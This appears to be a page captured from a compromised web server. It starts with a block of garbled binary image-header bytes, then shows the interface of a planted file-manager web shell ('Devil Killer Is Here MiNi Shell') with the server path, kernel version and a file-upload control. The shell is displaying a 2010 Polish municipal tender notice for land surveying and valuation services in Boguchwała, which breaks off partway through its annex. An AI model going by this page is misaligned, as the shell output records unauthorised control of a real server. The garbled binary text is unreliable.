JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100426/116550-N-2010.html

<p class="kh_header"><b>Boguchwała: Sporządzenie podziałów geodezyjnych nieruchomości gruntowych, rozgraniczeń nieruchomości, aktualizacji map do celów projektowych, inwentaryzacji powykonawczej, wyniesienie koncepcji dróg gminnych i wyniesienie projektów, wznowienie punktów granicznych, wykonanie dokumentacji do celów prawnych, wykonanie operatów szacunkowych nieruchomości</b><br>
<b>Numer ogłoszenia: 116550 - 2010; data zamieszczenia: 26.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Boguchwała , ul. Tkaczowa 134, 36-040 Boguchwała, woj. podkarpackie, tel. 017 8755201, faks 017 8755209.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.boguchwala.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie podziałów geodezyjnych nieruchomości gruntowych, rozgraniczeń nieruchomości, aktualizacji map do celów projektowych, inwentaryzacji powykonawczej, wyniesienie koncepcji dróg gminnych i wyniesienie projektów, wznowienie punktów granicznych, wykonanie dokumentacji do celów prawnych, wykonanie operatów szacunkowych nieruchomości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1
Sporządzenie podziałów geodezyjnych nieruchomości gruntowych określonych granicami obrębów: Kielanówka, Racławówka, Nosówka.

Zamawiający przewiduje wykonanie następującej ilości usług:
dwie pierwsze działki powstałe z podziału w danym zleceniu -12 podziałów
do 10 w danym zleceniu - 12 podziałów
do 30 w danym zleceniu - 20 podziałów
działki powstałe z podziału  powyżej 30 w danym zleceniu - 1 podział

Operaty podziałowe wykonywane w ramach zadania  winny zwierać :
a/wstępny projekt podziału
b/projekt podziału (mapa +wykaz zmian gruntowych) - 3 egzemplarze
c/aktualny wypis z rejestru gruntów  

Zadanie 2
Sporządzenie podziałów geodezyjnych nieruchomości gruntowych określonych granicami obrębów: Boguchwała, Zarzecze, Lutoryż,.
Zamawiający przewiduje wykonanie następującej ilości usług:
dwie pierwsze działki powstałe z podziału w danym zleceniu:- 10 podziałów
do 10 w danym zleceniu :  -36 podziałów
działki powstałe z podziału do 30 w danym zleceniu: - 43 podziałów
działki powstałej z podziału powyżej 30 w danym zleceniu   -11 podziałów                                                                           

Operaty podziałowe wykonywane w ramach zadania  winny zwierać :
a/wstępny projekt podziału
b/projekt podziału(mapa +wykaz zmian gruntowych) - 3 egzemplarze
c/aktualny wypis z rejestru gruntów  

Zadanie 3
Sporządzenie podziałów geodezyjnych nieruchomości gruntowych określonych granicami obrębów: Zgłobień, Wola Zgłobieńska, Niechobrz, Mogielnica.
Zamawiający przewiduje wykonanie następującej ilości usług:
dwie pierwsze działki powstałe z podziału w danym zleceniu: -10 podziałów
 do 10 w danym zleceniu :- 22 podziałów
do 30 w danym zleceniu: - 20 podziały
 działki powstałej z podziału powyżej 30 w danym zleceniu -  1  podział                                                                              

Operaty podziałowe wykonywane w ramach zadania  winny zwierać :
a)wstępny projekt podziału
b)projekt podziału(mapa +wykaz zmian gruntowych) - 3 egzemplarze
c)aktualny wypis z rejestru gruntów  

Zadanie 4
Rozgraniczenia nieruchomości obejmujących obszar wszystkich obrębów gminy Boguchwała.
Zamawiający przewiduje wykonanie następującej ilości usług:
ustalenie granicy  nieruchomości do 2 pkt. (ryczałt) - 6 rozgraniczeń       
ustalenie granicy  nieruchomości do 10 pkt. - 13 rozgraniczeń
ustalenie granicy  nieruchomości powyżej 10 pkt.-  1 rozgraniczenie
Dokumentacja winna zawierać zasób bazowy dla Zamawiającego
Zadanie 5
Aktualizacja map dla celów projektowych obejmujących obszar wszystkich obrębów gminy Boguchwała.
Zamawiający przewiduje wykonanie następującej ilości usług:
aktualizacja map dla celów projektowych wraz z uzgodnieniami w ZUDP :
a)działka do 0.5 ha - 1 zlecenie do 0,5 ha               
b) pierwszy hektar 
każdy następny hektar      2 zlecenia-  2,5 ha              

Dokumentacja winna zawierać mapę do celów projektowych wraz z klauzulą Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej. 

Zadanie 6
Inwentaryzacja powykonawcza obiektu obejmująca obszar wszystkich obrębów gminy Boguchwała.
Zamawiający przewiduje wykonanie następującej ilości usług:
obiekt  liniowy (pierwszy hektometr) - 2 hektometry
każdy następny hektometr - 2 hektometry

Dokumentacja winna zawierać mapę inwentaryzacji powykonawczej wraz z opinią ZUD. 

Zadanie 7
Wznowienia punktów granicznych na podstawie istniejących materiałów geodezyjnych wraz ze stabilizacją punktów granicznych znakami betonowymi obejmujących obszar wszystkich obrębów gminy Boguchwała.
Zamawiający przewiduje wykonanie następującej ilości usług:
wznowienie pkt. granicznych do 4 pkt. - 7 punktów                                                                                                                                                 
wznowienie pkt. granicznych do 20 pkt.- 21 punktów                                                                                                                                          
wznowienie pkt. granicznych powyżej 20 pkt.- 5 punktów       
Dokumentacja winna zawierać :
a) protokół stabilizacji punktów granicznych wraz ze szkicem polowym i kopią mapy zasadniczej przedstawiająca położenie punktów. 
                                                              

Zadanie 8
Wykonanie dokumentacji dla celów prawnych w sołectwach -  Racławówka, Niechobrz , Nosówka, Zgłobień, Wola Zgłobieńska. 

Zamawiający przewiduje wykonanie następującej ilości usług:
pierwsza działka w jednej  pozycji rejestrowej -  10 działek
każda następna w danej pozycji rejestrowej  - 5 działek
W ramach zlecenia wykonawca  obowiązany jest doręczyć zleceniodawcy:
a)mapę ewidencji gruntów  wraz z synchronizację,
b) przedłożenia dokumentu stwierdzającego stan prawny nieruchomości,

Zadanie 9
Wykonanie dokumentacji dla celów prawnych w sołectwach -  Boguchwała, Mogielnica ,  Kielanówka, Zarzecze, Lutoryż. 
Zamawiający przewiduje wykonanie następującej ilości usług:
pierwsza działka w jednej  pozycji rejestrowej -  10 działek
każda następna w danej pozycji rejestrowej  - 5 działek
W ramach zlecenia wykonawca  obowiązany jest doręczyć zleceniodawcy:
a)mapę ewidencji gruntów  wraz z synchronizację,
b) przedłożenia dokumentu stwierdzającego stan prawny nieruchomości,
Zadanie 10
Wykonanie operatów szacunkowych nieruchomości , obejmujących obszar wszystkich obrębów gminy Boguchwała.
Zamawiający przewiduje wykonanie następującej ilości usług:
a)wykonanie operatu szacunkowego  pojedynczej działki gruntowej niezabudowanej-13        
b)wykonanie operatu szacunkowego pojedynczej działki gruntowej zabudowanej  - 4               
c)wykonanie operatu szacunkowego  lokalu -9 
d)wykonanie operatu szacunkowego  garażu - 1

W ramach zlecenia wykonawca jest zobowiązany przedłożyć 
- operat szacunkowy - 2 egzemplarze 

Zadanie 11
Opracowanie dokumentacji formalno - prawnej do komunalizacji mienia 
Zamawiający przewiduje wykonanie następującej ilości usług:
wykonanie dokumentacji geodezyjno-prawnej wraz z zebraniem dokumentów niezbędnych do założenia ksiąg wieczystych - 20 działek

Przedmiotem zamówienia jest zlecenie opracowania dokumentacji dla około 20 działek do (komunalizacji) tj. założenia księgi wieczystej, a następnie uzyskania decyzji Wojewody Podkarpackiego.
Na podstawie art. 5 ust.1  lub art.7 ust.1 ustawy z dnia 10 maja 1990 r. Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę o pracownikach samorządowych działki te z mocy prawa stały się własnością gminy Boguchwała. W celu uzyskania decyzji deklaratoryjnej niezbędne jest ujawnienie prawa własności. W tym celu niezbędne jest zlecenie opracowania dokumentacji prawnej.  Z uwagi na skomplikowany, indywidualny charakter każdej dokumentacji polegającej na tym iż oprócz sporządzenia wyrysu wraz z wykazem synchronizacyjnym (badaniem hipotecznym) niezbędne jest odszukanie dokumentów potwierdzających przejście danej  nieruchomości na Skarb Państwa tj. Aktu własności Ziemi, decyzji przekazania na Skarb Państwa, decyzje wymienne, postanowienia sądowe.   
W ramach zlecenia wykonawca  obowiązany jest doręczyć zleceniodawcy:
a)mapę ewidencji gruntów  wraz z synchronizację,
b)w razie potrzeby Wykonawca zobowiązany jest do przedłożenia dokumentu ustalające poprzedniego właściciela nieruchomości,
c)dokumentu stwierdzającego przejście nieruchomości na Skarb państwa. 
Termin realizacji pojedynczego zamówienia będzie wynosił 4-mce od dnia otrzymania zlecenia. Wykonanie  poszczególnych prac będzie zlecane sukcesywnie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, polegających na powtórzeniu tego samego rodzaju zamówień, stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium:
Zadanie 1: o wartości:    400,00 zł. Słownie: czterysta t złotych
Zadanie 2: o wartości:    500,00 zł. Słownie: pięćset złotych
Zadanie 3: o wartości:    350,00 zł. Słownie: trzysta pięćdziesiąt złotych
Zadanie 4: o wartości:    200,00 zł Słownie: dwieście złotych
Zadanie 7: o wartości:    150,00 zł Słownie:  sto pięćdziesiąt złotych
Zadanie 10: o wartości:  150,00 zł Słownie: sto pięćdziesiąt złotych
Zadanie 11: o wartości:  200,00 zł. Słownie: dwieście złotych

Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 ze zm.).
Wadium w formie pieniężnej należy wnieść przelewem z rachunku Wykonawcy na rachunek bankowy Zamawiającego: 
Bank BS Niechobrz konto nr 86916300092001000000390010
Wadium wnoszone w formie: poręczenia bankowego lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w kasie Zamawiającego.
Nie należy załączać oryginału dokumentu wadialnego do oferty.
Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia 04 maja 2010 roku, do godz. 1230.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
Wykonawca, który nie wniesie wadium lub nie zabezpieczy ofertę akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
1. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 8.

3. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.

4.  Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

5. Zamawiający będzie  żądać ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt. 2, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.

6. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.

7.  Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

8.  Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności WG ZAŁĄCZNIKA NR 4</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 Ustawy Zamawiający przewiduje możliwość dokonania istotnej zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy określając następujące warunki zmiany:
-   zmiany terminu wykonania oraz zmiany sposobu i form płatności w przypadku wystąpienia siły wyższej np. kataklizmu, wojny, niesprzyjających warunków pogodowych, stanu wyjątkowego itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.boguchwala.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Boguchwale
ul. Doktora Tkaczowa 134, 36-040 Boguchwała
II PIĘTRO pok. nr 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2010 godzina 12:30, miejsce: Urząd Miejski w Boguchwale
ul. Doktora Tkaczowa 134, 36-040 Boguchwała
PARTER Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sporządzenie podziałów geodezyjnych nieruchomości gruntowych określonych granicami obrębów: Kielanówka, Racławówka, Nosówka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje wykonanie następującej ilości usług:
dwie pierwsze działki powstałe z podziału w danym zleceniu -12 podziałów
do 10 w danym zleceniu - 12 podziałów
do 30 w danym zleceniu - 20 podziałów
działki powstałe z podziału  powyżej 30 w danym zleceniu - 1 podział

Operaty podziałowe wykonywane w ramach zadania  winny zwierać :
a)wstępny projekt podziału
b)projekt podziału (mapa +wykaz zmian gruntowych) - 3 egzemplarze
c)aktualny wypis z rejestru gruntów  

Termin realizacji:
1. Sporządzenie wstępnego projektu podziału - 14 dni  kalendarzowych (liczone od daty    
     otrzymania zlecenia)
2. Sporządzenie ostatecznego podziału licząc od daty powiadomienia Wykonawcy przez Zamawiającego o uzyskaniu postanowienia Referatu Gospodarki gruntami zatwierdzającego wstępny projekt podziału;
a. 40 dni kalendarzowych - gdy z podziału powstaje do 10 nowych działek
b. 70 dni kalendarzowych - gdy z podziału powstaje do 30 nowych działek
c. 110 dni kalendarzowych - gdy z podziału powstaje powyżej 30 nowych działek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2
Sporządzenie podziałów geodezyjnych nieruchomości gruntowych określonych granicami obrębów: Boguchwała, Zarzecze, Lutoryż..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje wykonanie następującej ilości usług:
dwie pierwsze działki powstałe z podziału w danym zleceniu:- 10 podziałów
do 10 w danym zleceniu :  -36 podziałów
działki powstałe z podziału do 30 w danym zleceniu: - 43 podziałów
działki powstałej z podziału powyżej 30 w danym zleceniu   -11 podziałów                                                                           

Operaty podziałowe wykonywane w ramach zadania  winny zwierać :
a)wstępny projekt podziału
b)projekt podziału(mapa +wykaz zmian gruntowych) - 3 egzemplarze
c)aktualny wypis z rejestru gruntów  

Termin realizacji:
1. Sporządzenie wstępnego projektu podziału - 14 dni  kalendarzowych (liczone od daty  otrzymania zlecenia)
2. Sporządzenie ostatecznego podziału licząc od daty powiadomienia Wykonawcy przez Zamawiającego o uzyskaniu postanowienia Referatu Gospodarki gruntami zatwierdzającego wstępny projekt podziału;
